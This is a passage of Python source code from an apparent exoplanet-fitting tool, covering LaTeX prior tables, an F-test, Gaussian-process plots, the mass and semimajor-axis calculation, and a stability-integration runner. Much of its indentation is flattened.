% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
if obj.K_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.K_norm_pr[i][0],obj.K_norm_pr[i][1],"$^2$"
elif obj.K_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.K_jeff_pr[i][0],obj.K_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.K_bound[i][0],obj.K_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
if obj.P_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.P_norm_pr[i][0],obj.P_norm_pr[i][1],"$^2$"
elif obj.P_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.P_jeff_pr[i][0],obj.P_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.P_bound[i][0],obj.P_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
if obj.e_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_norm_pr[i][0],obj.e_norm_pr[i][1],"$^2$"
elif obj.e_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_jeff_pr[i][0],obj.e_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_bound[i][0],obj.e_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.w_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.w_norm_pr[i][0],obj.w_norm_pr[i][1],"$^2$"
elif obj.w_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.w_jeff_pr[i][0],obj.w_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.w_bound[i][0],obj.w_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
if obj.M0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.M0_norm_pr[i][0],obj.M0_norm_pr[i][1],"$^2$"
elif obj.M0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.M0_jeff_pr[i][0],obj.M0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.M0_bound[i][0],obj.M0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.hkl == True:
text = text + '''{0:{width}s}'''.format("$e\sin(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_sinw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_sinw_norm_pr[i][0],obj.e_sinw_norm_pr[i][1],"$^2$"
elif obj.e_sinw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_sinw_jeff_pr[i][0],obj.e_sinw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_sinw_bound[i][0],obj.e_sinw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e\cos(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_cosw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_cosw_norm_pr[i][0],obj.e_cosw_norm_pr[i][1],"$^2$"
elif obj.e_cosw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_cosw_jeff_pr[i][0],obj.e_cosw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_cosw_bound[i][0],obj.e_cosw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
if obj.lamb_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.lamb_norm_pr[i][0],obj.lamb_norm_pr[i][1],"$^2$"
elif obj.lamb_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.lamb_jeff_pr[i][0],obj.lamb_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.lamb_bound[i][0],obj.lamb_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.i_norm_pr[i][0],obj.i_norm_pr[i][1],"$^2$"
elif obj.i_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.i_jeff_pr[i][0],obj.i_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.i_bound[i][0],obj.i_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.Node_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.Node_norm_pr[i][0],obj.Node_norm_pr[i][1],"$^2$"
elif obj.Node_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.Node_jeff_pr[i][0],obj.Node_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.Node_bound[i][0],obj.Node_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
            if obj.t0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.t0_norm_pr[i][0],obj.t0_norm_pr[i][1],"$^2$"
elif obj.t0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.t0_jeff_pr[i][0],obj.t0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.t0_bound[i][0],obj.t0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rp/$R_\star$", width = 30)
for i in range(obj.npl):
if obj.pl_rad_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_rad_norm_pr[i][0],obj.pl_rad_norm_pr[i][1],"$^2$"
elif obj.pl_rad_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_rad_jeff_pr[i][0],obj.pl_rad_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_rad_bound[i][0],obj.pl_rad_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("a/$R_\star$", width = 30)
for i in range(obj.npl):
if obj.pl_a_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_a_norm_pr[i][0],obj.pl_a_norm_pr[i][1],"$^2$"
elif obj.pl_a_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_a_jeff_pr[i][0],obj.pl_a_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_a_bound[i][0],obj.pl_a_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_lintr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_lintr_norm_pr[i][0],obj.rv_lintr_norm_pr[i][1],"$^2$"
elif obj.rv_lintr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_lintr_jeff_pr[i][0],obj.rv_lintr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_lintr_bounds[i][0],obj.rv_lintr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_quadtr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_quadtr_norm_pr[i][0],obj.rv_quadtr_norm_pr[i][1],"$^2$"
elif obj.rv_quadtr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_quadtr_jeff_pr[i][0],obj.rv_quadtr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_quadtr_bounds[i][0],obj.rv_quadtr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.rvoff_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rvoff_norm_pr[i][0],obj.rvoff_norm_pr[i][1],"$^2$"
elif obj.rvoff_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rvoff_jeff_pr[i][0],obj.rvoff_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rvoff_bounds[i][0],obj.rvoff_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.jitt_norm_pr[i][0],obj.jitt_norm_pr[i][1],"$^2$"
elif obj.jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.jitt_jeff_pr[i][0],obj.jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.jitt_bounds[i][0],obj.jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
if obj.GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_rot_norm_pr[i][0],obj.GP_rot_norm_pr[i][1],"$^2$"
elif obj.GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_rot_jeff_pr[i][0],obj.GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_rot_bounds[i][0],obj.GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
if obj.GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_sho_norm_pr[i][0],obj.GP_sho_norm_pr[i][1],"$^2$"
elif obj.GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_sho_jeff_pr[i][0],obj.GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_sho_bounds[i][0],obj.GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_off_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_off_norm_pr[i][0],obj.tra_off_norm_pr[i][1],"$^2$"
elif obj.tra_off_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_off_jeff_pr[i][0],obj.tra_off_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_off_bounds[i][0],obj.tra_off_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_jitt_norm_pr[i][0],obj.tra_jitt_norm_pr[i][1],"$^2$"
elif obj.tra_jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_jitt_jeff_pr[i][0],obj.tra_jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_jitt_bounds[i][0],obj.tra_jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.tra_doGP == True:
if obj.tra_gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_rot_str[i]), width = 30)
if obj.tra_GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_rot_norm_pr[i][0],obj.tra_GP_rot_norm_pr[i][1],"$^2$"
elif obj.tra_GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_rot_jeff_pr[i][0],obj.tra_GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_rot_bounds[i][0],obj.tra_GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.tra_gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_sho_str[i]), width = 30)
if obj.tra_GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_sho_norm_pr[i][0],obj.tra_GP_sho_norm_pr[i][1],"$^2$"
elif obj.tra_GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_GP_sho_jeff_pr[i][0],obj.tra_GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_GP_sho_bounds[i][0],obj.tra_GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
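# Companion sketch for latex_prior_table: instead of writing a file, the LaTeX source can
# be returned as a string (again, 'fit' is a hypothetical fitted object).
def _example_prior_table_text(fit):
    """Return the prior table as a LaTeX string. Never called anywhere."""
    return latex_prior_table(fit, precision=2, return_text=True)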
def f_test(obj, obj2 = None, alpha = 0.01, lnL=False):
chi2 = obj.fit_results.chi2
ndata = len(obj.fit_results.jd)
par2 = obj.fit_results.mfit
# self.value_reduced_chi2.setText("%.4f"%(fit.fit_results.reduced_chi2))
#self.value_loglik.setText("%.4f"%(fit.fit_results.loglik))
# self.value_loglik.setText("%.4f"%(fit.loglik))
if obj2 == None:
obj2 = dill.copy(obj)
obj2.npl = 0
obj2.fitting()
else:
obj2 = dill.copy(obj2)
if len(obj.fit_results.jd) != len(obj2.fit_results.jd):
print("not the same data, test makes no sense")
return
chi1 = obj2.fit_results.chi2
par1 = obj2.fit_results.mfit
chi2_red = chi2/(ndata - par2)
if lnL == True:
F = 2*(obj.loglik - obj2.loglik) # in case \Delta lnL must be tested.
else:
if abs(par2-par1) > 0:
F = ((chi1 - chi2)/(par2-par1))/chi2_red # else standard f-test
else:
print("Nothing to test. The Tested model has == or < Npar. than the null model.")
return
p_value = pdf.f.sf(F, par2 - par1, ndata - par2, loc=0, scale=1)
print("""
\chi^2 null model = %s
\chi^2 tested model = %s
lnL null model = %s
lnL tested model = %s
N parametrs null model = %s
N parametrs tested model = %s
F value = %s
p-value = %s
alpha value = %s
"""%(chi1,chi2,obj.loglik,obj2.loglik,par1,par2,F,p_value,alpha))
if float(p_value) < alpha:
print("Null hypothesis rejected")
print("Probability = ", (1.0-float(p_value))*100.0,'%')
else:
print("Null hypothesis cannot be rejected")
def plot_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.fit_results.rv_model.jd
y = obj.fit_results.rv_model.o_c
y_err = obj.fit_results.rv_model.rv_err
idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.gp_model_curve
else:
x_model = x
mu,var,std = obj.gp_model_data
#print(mu[0:10])
#print(y[0:10])
for i in range(obj.filelist.ndset):
plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
def plot_transit_gp(obj, curve=False):
import matplotlib.pyplot as plt
color="#ff7f0e"
colors = ['b','g','r']
x = obj.tra_data_sets[0][0]
y = obj.tra_data_sets[0][1]
y_err = obj.tra_data_sets[0][2]
#idset = obj.filelist.idset
if curve==True:
x_model = np.linspace(min(x), max(x), 5000) #obj.fit_results.model_jd
mu,var,std = obj.tra_gp_model_curve
else:
x_model = x
mu,var,std = obj.tra_gp_model_data
#print(mu[0:10])
#print(y[0:10])
#for i in range(obj.filelist.ndset):
#plt.errorbar(x[idset==i],y[idset==i], yerr=y_err[idset==i], fmt=".",color=colors[i], capsize=0);
plt.errorbar(x,y, yerr=y_err, fmt=".",color=colors[0], capsize=0);
plt.plot(x_model, mu, color = '0.5' );
plt.fill_between(x_model ,mu+std, mu-std, color=color, alpha=0.3, edgecolor="none")
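# Usage sketch for the two GP plotting helpers above ('fit' is a hypothetical fitted
# object that already carries gp_model_data / gp_model_curve, i.e. a GP model has been
# evaluated beforehand).
def _example_plot_gp(fit):
    """Overlay the RV GP model on the residuals and show the figure."""
    import matplotlib.pyplot as plt
    plot_gp(fit, curve=True)   # smooth model curve on a dense grid
    plt.show()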
####################### mass_semimajor ###########################################
def mass_a_from_Kepler_fit(a,npl,m0):
    '''Calculate the actual masses and Jacobi semimajor axes of a
    system, for an assumed sin(i), using the parameters P, K and e from a Keplerian fit.
    The output is in Mjup and AU.
'''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
incl = 90.0
sini = np.sin(PI*(incl/180.0))
mass = np.zeros(npl+1)
ap = np.zeros(npl)
pl_mass = np.zeros(npl)
mpold = pl_mass
    #******* G is set to unity, with s, m and kg as the units of time, length and mass
    #***** there is a reason for that! It may be corrected later.
mtotal = m0
f = 5e-6
for i in range(npl):
T = a[5*i+1]*86400.0
mass[0] = m0
        # we need an initial guess for each planet mass
dm = 0
mass[i+1] = abs(a[5*i])*(T*(m0)**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = m0
mass[i+1] = abs(a[5*i])*(T*(m0 + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
else:
mtotal = m0
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(a[5*i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-a[5*i+2]**2.0)/abs(sini)
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(npl):
ap[i] = ap[i]/AU # to be in AU
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
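# Usage sketch for mass_a_from_Kepler_fit (numbers are made up). The parameter vector is
# assumed to be packed 5 per planet as [K [m/s], P [day], e, omega, M0], matching the
# a[5*i + ...] indexing used above; m0 is the stellar mass in solar masses.
def _example_mass_a(m0=1.0):
    """Return (masses in Mjup, semimajor axes in AU) for one fake planet."""
    params = [50.0, 365.25, 0.1, 90.0, 0.0]   # K, P, e, omega, M0 for planet 1
    pl_mass, ap = mass_a_from_Kepler_fit(params, 1, m0)
    return pl_mass, ap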
def run_stability(obj, timemax=3000.0, timestep=10, timeout_sec=1000.0, stab_save_dir = './run', remove_stab_save_dir = True, integrator='symba' ):
#if not os.path.exists(directory):
# os.makedirs(directory)
#if integrator=='symba':
# os.chdir('./stability/symba/')
#elif integrator=='mvs':
# os.chdir('./stability/mvs/')
#elif integrator=='mvs_gr':
# os.chdir('./stability/mvs_gr/')
#if stab_save_dir != '':
os.chdir('./stability/')
os.system("mkdir %s"%stab_save_dir)
os.chdir("./%s"%stab_save_dir)
print("running stability with: %s"%integrator)
    ##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
    max_time = float(timemax)*365.25 # convert to days
param_file.write(b"""0.0d0 %s %s
%s %s
F T T T T F
0.0001 50.0 50.0 -1. T
bin.dat
unknown
"""%(bytes(str(max_time).encode()),
bytes(str(timestep).encode()),
bytes(str(max_time/1e4).encode()),
bytes(str(max_time/1e3).encode()) ))
param_file.close()
#os.system("cp param.in test_param.in__")
getin_file = open('geninit_j.in', 'wb')
getin_file.write(b"""1
%s
%s
1.d0
pl.in
"""%(bytes(str(obj.params.stellar_mass).encode()), bytes(str(obj.npl).encode() ) ))
for j in range(obj.npl):
getin_file.write(b'%s \n'%bytes(str(obj.fit_results.mass[j]/1047.70266835).encode()))
getin_file.write(b'%s %s %s %s %s %s \n'%(bytes(str(obj.fit_results.a[j]).encode()),
bytes(str(obj.params.planet_params[7*j + 2]).encode()),
bytes(str(obj.params.planet_params[7*j + 5]).encode()),
bytes(str(obj.params.planet_params[7*j + 3]).encode()),
bytes(str(obj.params.planet_params[7*j + 6]).encode()),
bytes(str(obj.params.planet_params[7*j + 4]).encode() )) )
getin_file.close()
    # running the Fortran codes
result, flag = run_command_with_timeout('../mvs/geninit_j3_in_days < geninit_j.in', timeout_sec)
if integrator=='symba':
result, flag = run_command_with_timeout('../symba/swift_symba5_j << EOF \nparam.in \npl.in \n1e-40 \nEOF', timeout_sec)
elif integrator=='mvs':
result, flag = run_command_with_timeout('../mvs/swift_mvs_j << EOF \nparam.in \npl.in \nEOF', timeout_sec)
elif integrator=='mvs_gr':
result, flag = run_command_with_timeout('../mvs_gr/swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%int(obj.GR_step), timeout_sec)
#print('./swift_mvs_j_GR << EOF \nparam.in \npl.in \n%s \nEOF'%obj.GR_step)
if not os.path.exists("energy.out"):
os.chdir('../../')
print("something went wrong!!! No output generated.")
return obj
obj.evol_T_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [0]) / 365.25
obj.evol_energy = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [1])
# obj.evol_momentum = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['lx'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [2])
obj.evol_momentum['ly'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [3])
obj.evol_momentum['lz'] = np.genfromtxt("energy.out",skip_header=0, unpack=True,skip_footer=1, usecols = [4])
for k in range(obj.npl):
if integrator=='symba':
result, flag = run_command_with_timeout('../symba/follow_symba2 << EOF \nparam.in \npl.in \n%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow_symba.out pl_%s.out'%(k+1),timeout_sec)
elif integrator=='mvs' or integrator=='mvs_gr':
result, flag = run_command_with_timeout('../mvs/follow2 << EOF \nparam.in \npl.in \n-%s \nEOF'%(k+2),timeout_sec)
result, flag = run_command_with_timeout('mv follow2.out pl_%s.out'%(k+1),timeout_sec)
